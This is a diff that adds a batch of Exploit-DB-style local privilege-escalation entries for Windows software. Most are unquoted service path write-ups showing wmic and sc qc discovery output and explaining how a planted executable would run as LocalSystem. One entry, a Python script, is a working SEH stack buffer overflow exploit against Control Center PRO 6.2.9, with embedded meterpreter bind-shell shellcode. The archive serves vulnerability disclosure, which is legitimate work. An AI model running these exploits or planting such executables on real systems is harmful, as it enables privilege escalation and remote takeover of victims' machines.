+BlueStacks Log Rotator Service       BstHdLogRotatorSvc       C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe        Auto
+
+#We use the name of service to get its information using next command.
+
+C:\Users\user>sc qc BstHdLogRotatorSvc
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: BstHdLogRotatorSvc
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : BlueStacks Log Rotator Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47584.txt b/exploits/windows/local/47584.txt
new file mode 100644
index 000000000..d201ca803
--- /dev/null
+++ b/exploits/windows/local/47584.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Network Inventory Advisor 5.0.26.0 - 'niaservice' Unquoted Service Path
+# Date: 2019-11-04
+# Exploit Author: Samuel DiazL
+# Vendor Homepage: https://www.network-inventory-advisor.com/
+# Software Link: https://www.network-inventory-advisor.com/download.html
+# Version: 5.0.26.0
+# Tested on: Microsoft Windows 10 Enterprise x64 ESP
+# CVE: N/A
+
+# Description:
+# Network Inventory Advisor installs niaservice as a service with an unquoted service path
+
+C:\Users\SD502812>sc qc niaservice
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: niaservice
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ClearApps\Network Inventory Advisor\niaservice.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Network Inventory Advisor Service by ClearApps Software
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47593.txt b/exploits/windows/local/47593.txt
new file mode 100644
index 000000000..7c9372020
--- /dev/null
+++ b/exploits/windows/local/47593.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path
+# Discovery by: Marcos Antonio León (psk)
+# Discovery Date: 2019-11-04
+# Vendor Homepage: https://www.wacom.com
+# Software Link : http://cdn.wacom.com/U/drivers/IBMPC/pro/WacomTablet_637-3.exe
+# Tested Version: 6.3.7.3
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>sc qc WTabletServicePro
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WTabletServicePro
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
+        GRUPO_ORDEN_CARGA  : PlugPlay
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Wacom Professional Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local attacker must insert an
+executable file in the path of the service. Upon service restart or
+system reboot, the malicious code will be run with elevated
+privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/47594.txt b/exploits/windows/local/47594.txt
new file mode 100644
index 000000000..5a7f9a97b
--- /dev/null
+++ b/exploits/windows/local/47594.txt
@@ -0,0 +1,52 @@
+# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path
+# Discovery Date: 2019-11-05
+# Exploit Author: Ivan Marmolejo
+# Vendor Homepage: https://www.qnap.com/en/ 
+# Software Link: https://www.qnap.com/en/download
+# Version: 4.5.6.0607
+# Vulnerability Type: Local
+# Tested on: Windows XP Profesional Español SP3
+
+#Exploit
+##############################################################################################################################################
+
+Summary:  QNAP NetBak Replicator provides several options for copying files from your Windows computer to your NAS. By simplifying the backup 
+process, NetBak Replicator helps ensure that your files are safe even when your computer becomes unavailable.
+
+Description:    The application suffers from an unquoted search path issue impacting the service 'QVssService'. This could potentially allow an 
+authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
+the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
+potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+##############################################################################################################################################
+
+Step to discover the unquoted Service:
+
+ 
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+
+QNAP Vss Service            QVssService               C:\Archivos de programa\QNAP\NetBak\QVssService.exe 		                 Auto
+
+
+##############################################################################################################################################
+
+Service info:
+
+
+C:\Users\user>sc qc QVssService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: QVssService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Archivos de programa\QNAP\NetBak\QVssService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : QNAP Vss Service
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem
+
+##############################################################################################################################################
\ No newline at end of file
diff --git a/exploits/windows/local/47597.txt b/exploits/windows/local/47597.txt
new file mode 100644
index 000000000..2bcd26444
--- /dev/null
+++ b/exploits/windows/local/47597.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path
+# Date: 2019-11-06
+# Exploit Author: Mariela L Martínez Hdez
+# Vendor Homepage: https://webcompanion.com/en/
+# Software Link: https://webcompanion.com/en/
+# Version: Adaware Web Companion version 4.8.2078.3950
+# Tested on: Windows 10 Home (64 bits)
+
+# 1. Description
+# Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path.
+
+# 2. PoC
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
+
+WC Assistant        WCAssistantService        C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe     Auto
+
+C:\>sc qc WCAssistantService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WCAssistantService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : WC Assistant
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+ 
+
+# 3. Exploit
+# A successful attempt would require the local user to be able to insert their code in the system 
+# root path undetected by the OS or othersecurity applications where it could potentially be executed 
+# during application startup or reboot. If successful, the local user's code would execute with 
+# the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/47599.txt b/exploits/windows/local/47599.txt
new file mode 100644
index 000000000..519a45f2b
--- /dev/null
+++ b/exploits/windows/local/47599.txt
@@ -0,0 +1,36 @@
+# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
+# Date: 2019-11-08
+# Exploit Author: Carlos A Garcia R
+# Vendor Homepage: https://www.kiwisyslog.com/
+# Software Link: https://www.kiwisyslog.com/downloads
+# Version: 8.3.52
+# Tested on: Windows XP Professional Service Pack 3
+
+# Description:
+# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs
+
+# PoC:
+
+# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Kiwi Syslog Server	Kiwi Syslog Server	C:\Archivos de programa\Syslogd\Syslogd_Service.exe	Auto
+
+# C:\>sc qc "Kiwi Syslog Server"
+[SC] GetServiceConfig SUCCESS
+
+SERVICE_NAME: Kiwi Syslog Server
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Kiwi Syslog Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+ 
+# Exploit
+Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" 
+could be placed in "C:\", and it would be executed as the Local System user 
+next time the service was restarted.
\ No newline at end of file
diff --git a/exploits/windows/local/47604.txt b/exploits/windows/local/47604.txt
new file mode 100644
index 000000000..3ad9171e4
--- /dev/null
+++ b/exploits/windows/local/47604.txt
@@ -0,0 +1,31 @@
+# Exploit Title: _GCafé 3.0  - 'gbClienService' Unquoted Service Path
+# Google Dork: N/A
+# Date: 2019-11-09
+# Exploit Author: Doan Nguyen (4ll4u)
+# Vendor Homepage: https://gcafe.vn/
+# Software Link:  https://gcafe.vn/post/view?slug=gcafe-3.0
+# Version: v3.0
+# Tested on: Windows 7, Win 10, WinXP
+# CVE : N/A  
+# Description:
+# GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points
+
+# PoC:
+
+# wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+gbClientService		gbClientService		C:\Program Files\GBillingClient\gbClientService.exe		Auto
+#C:\>sc qc gbClientService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: gbClientService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\GBillingClient\gbClientService.exe
+        LOAD_ORDER_GROUP   : GarenaGroup
+        TAG                : 0
+        DISPLAY_NAME       : gbClientService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
\ No newline at end of file
diff --git a/exploits/windows/local/47605.txt b/exploits/windows/local/47605.txt
new file mode 100644
index 000000000..bdebb3898
--- /dev/null
+++ b/exploits/windows/local/47605.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
+# Date: 2019-11-07
+# Exploit Author: Héctor Gabriel Chimecatl Hernández
+# Vendor Homepage: https://www.alps.com/e/
+# Software Link: https://www.alps.com/e/
+# Version: 8.1.0.10
+# Tested on: Windows 10 Home Single Language x64 Esp
+
+# Step to discover the unquoted Service:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+# Service info:
+
+Alps HID Monitor Service	ApHidMonitorService	C:\Program Files\Apoint2K\HidMonitorSvc.exe	Auto
+
+C:\Users\user>sc qc ApHidMonitorService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ApHidMonitorService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Alps HID Monitor Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47615.txt b/exploits/windows/local/47615.txt
new file mode 100644
index 000000000..c24356fb9
--- /dev/null
+++ b/exploits/windows/local/47615.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path
+# Date: 2019-11-11
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.acronis.com
+# Software: ftp://supportdownload:supportdownload@ftp.kingston.com/AcronisTrueImageOEM_5128.exe
+# Version: 19.0.5128
+# Tested on: Windows 10
+
+# Description:
+# Acronis True Image OEM 19.0.5128 suffers from an unquoted search path issue impacting the service 'afcdpsrv'. This could potentially allow an 
+# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
+# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
+# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
+# of the application.
+
+# Prerequisites
+# Local, Non-privileged Local User with restart capabilities
+
+# Details
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Acronis Nonstop Backup Service		afcdpsrv	C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe	Auto
+
+C:\>sc qc afcdpsrv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: afcdpsrv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Acronis Nonstop Backup Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47617.txt b/exploits/windows/local/47617.txt
new file mode 100644
index 000000000..d28e21eaf
--- /dev/null
+++ b/exploits/windows/local/47617.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: chuyreds
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 2.4.3.231
+# Tested on: Windows 10 Home Single Language
+# CVE : N/A
+
+# Explot-Wondershare WsAppService.txt
+
+#Service Info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Application Framework Service           WsAppService      C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe         Auto
+
+
+C:\Users\user>sc query WsAppService
+
+NOMBRE_SERVICIO: WsAppService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        ESTADO             : 4  RUNNING
+                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
+        CÓD_SALIDA_WIN32   : 0  (0x0)
+        CÓD_SALIDA_SERVICIO: 0  (0x0)
+        PUNTO_COMPROB.     : 0x0
+        INDICACIÓN_INICIO  : 0x0
\ No newline at end of file
diff --git a/exploits/windows/local/47637.txt b/exploits/windows/local/47637.txt
new file mode 100644
index 000000000..f49441761
--- /dev/null
+++ b/exploits/windows/local/47637.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
+# Date: 2019-11-12
+# Exploit Author: Mario Rodriguez
+# Vendor Homepage: https://www.alps.com/e/
+# Software Link: https://www.alps.com/e/
+# Version: 8.1202.1711.04
+# Tested on: Windows 10 Home x64 Spanish
+
+#The Alps Pointing-device controller installs a service with an unquoted path
+#which could be used as a local privilege escalation vulnerability. To exploit this vulnerability,
+#an executable file could be placed in the path of the service and after rebooting the system or
+#restarting the service the malicious code will be executed with elevated privileges.
+
+#Step to discover the vulnerability
+
+C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+Alps HID Monitor Service    ApHidMonitorService     C:\Program Files\Apoint2K\HidMonitorSvc.exe     Auto
+
+C:\Users\user>sc qc ApHidMonitorService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ApHidMonitorService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Alps HID Monitor Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47642.txt b/exploits/windows/local/47642.txt
new file mode 100644
index 000000000..fbaf9ec99
--- /dev/null
+++ b/exploits/windows/local/47642.txt
@@ -0,0 +1,27 @@
+# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: chuyreds
+# Vendor Homepage:https://www.realtek.com/en/
+# Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
+# Version: 6.4.10041.133 
+# Tested on: Windows 10 Home Single Language
+# CVE : N/A
+
+# Explot-Realtek.txt
+
+#Service Info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+RTK IIS Codec Service	RtkI2SCodec	C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe	Auto
+
+C:\Users\user>sc query RtkI2SCodec
+
+NOMBRE_SERVICIO: RtkI2SCodec
+        TIPO               : 10  WIN32_OWN_PROCESS
+        ESTADO             : 4  RUNNING
+                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
+        CÓD_SALIDA_WIN32   : 0  (0x0)
+        CÓD_SALIDA_SERVICIO: 0  (0x0)
+        PUNTO_COMPROB.     : 0x0
+        INDICACIÓN_INICIO  : 0x0
\ No newline at end of file
diff --git a/exploits/windows/local/47645.py b/exploits/windows/local/47645.py
new file mode 100755
index 000000000..e44561251
--- /dev/null
+++ b/exploits/windows/local/47645.py
@@ -0,0 +1,148 @@
+# Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH)
+# Date: 2019-11-09
+# Exploit Author: Samir sanchez garnica @sasaga92
+# Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
+# Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown
+# Version: 6.2.9
+# Tested: Windows 10 pro N and Windows XP SP3
+# CVE : N/A
+
+#!/usr/bin/python
+'''
+Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad
+considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH)
+'''
+
+import sys
+import random
+import string
+import struct
+import argparse
+
+def pattern_create(_type,_length):
+  _type = _type.split(" ")
+
+  if _type[0] == "trash":
+    return _type[1] * _length
+  elif _type[0] == "random":
+    return ''.join(random.choice(string.lowercase) for i in range(_length))
+  elif _type[0] == "pattern":
+    _pattern = ''
+    _parts = ['A', 'a', '0']
+    while len(_pattern) != _length:
+      _pattern += _parts[len(_pattern) % 3]
+      if len(_pattern) % 3 == 0:
+        _parts[2] = chr(ord(_parts[2]) + 1)
+        if _parts[2] > '9':
+          _parts[2] = '0'
+          _parts[1] = chr(ord(_parts[1]) + 1)
+          if _parts[1] > 'z':
+            _parts[1] = 'a'
+            _parts[0] = chr(ord(_parts[0]) + 1)
+            if _parts[0] > 'Z':
+              _parts[0] = 'A'
+    return _pattern
+  else:
+    return "Not Found"
+
+
+def generate_file(_name_file, _payload):
+	print _payload
+	print "[+] Creando Archivo malicioso"
+	_name_file = open(_name_file,"w+")
+	_name_file.write(_payload)
+	_name_file.close()
+	print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))
+
+def main():
+    _parser = argparse.ArgumentParser()
+    _parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True)
+    _args = _parser.parse_args()
+	
+	  #badchars 0x0a, 0x0d, >= 0x80
+
+    _name_exploit = "ControlCenterPRO_v6_2_9.txt"
+
+    #sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
+    _shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+        "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+        "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+        "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
+        "\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
+        "\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
+        "\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
+        "\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
+        "\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
+        "\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
+        "\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
+        "\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
+        "\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
+        "\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
+        "\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
+        "\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
+        "\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
+        "\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
+        "\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
+        "\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
+        "\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
+        "\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
+        "\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
+        "\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
+        "\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
+        "\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
+        "\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
+        "\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
+        "\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
+        "\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
+        "\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
+        "\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
+        "\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
+        "\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
+        "\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
+        "\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
+        "\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
+        "\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
+        "\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
+        "\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
+        "\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
+        "\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
+        "\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
+        "\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
+        "\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
+        "\x53\x41\x41")
+  
+    _offset = 664
+    _padding = 40000
+    _nseh = "\x42\x42\x77\x08"
+    _seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi  nonull, ascii
+    
+    if _args.os.lower() == "win10":
+      _esp_prepend =  "\x54\x58\x66\x05\x34\x18\x50\x5C"   
+      _inject = pattern_create("trash A",_offset)
+      _inject += _nseh
+      _inject += _seh
+      _inject += "A" * 4
+      _inject += _esp_prepend
+
+      _inject += _shellcode
+      _inject += pattern_create("trash D",_padding-len(_inject))
+
+    elif _args.os.lower() == "winxp":
+      _esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C"
+      _inject = pattern_create("trash A",_offset)
+      _inject += _nseh
+      _inject += _seh
+      _inject += "A" * 4
+      _inject += _esp_prepend
+      _inject += "A" * 16
+
+      _inject += _shellcode
+      _inject += pattern_create("trash D",_padding-len(_inject))
+    else:
+      print("[-] os select is not support, select win10 or winxp")
+
+
+    generate_file(_name_exploit, _inject)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/windows/local/47647.txt b/exploits/windows/local/47647.txt
new file mode 100644
index 000000000..f69fc1e05
--- /dev/null
+++ b/exploits/windows/local/47647.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Wondershare Application Framework Service - "WsAppService"  Unquote Service Path
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: chuyreds
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 2.4.3.231
+# Tested on: Windows 10 Home Single Language
+# CVE : N/A
+
+#Service Info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Application Framework Service	WsAppService	C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe	Auto
+
+
+C:\Users\user>sc query WsAppService
+
+NOMBRE_SERVICIO: WsAppService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        ESTADO             : 4  RUNNING
+                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
+        CÓD_SALIDA_WIN32   : 0  (0x0)
+        CÓD_SALIDA_SERVICIO: 0  (0x0)
+        PUNTO_COMPROB.     : 0x0
+        INDICACIÓN_INICIO  : 0x0
\ No newline at end of file
diff --git a/exploits/windows/local/47656.txt b/exploits/windows/local/47656.txt
new file mode 100644
index 000000000..46a2a55c6
--- /dev/null
+++ b/exploits/windows/local/47656.txt
@@ -0,0 +1,160 @@
+# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
+# Date: 2019-10-10
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: https://www.scanguard.com/
+# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
+# Version: 2020
+# Tested on: Windows
+# CVE : N/A
+# Category: exploit
+
+
+SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+
+[+] Credits: hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+[+] ISR: ApparitionSec          
+ 
+
+[Vendor]
+https://www.scanguard.com
+
+
+[Product]
+ScanGuard Antivirus
+ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d
+
+Complete Antivirus & Security Software
+
+
+[Vulnerability Type]
+Insecure Permissions
+
+
+[CVE Reference]
+CVE-2019-18895
+
+
+[Affected Product Code Base]
+ScanGuard Antivirus - latest
+
+
+[Affected Component]
+Permissions on installation directory
+
+
+[Attack Type]
+Local
+
+
+[Impact Code execution]
+true
+
+
+[Impact Escalation of Privileges]
+true
+
+
+[Impact Information Disclosure]
+true
+
+
+[Attack Vectors]
+Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.
+
+
+[Reference]
+https://support.scanguard.com/en/kb/22/upgrades-available
+
+
+[Security Issue]
+Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to
+privilege escalation via a Trojan horse executable file.
+
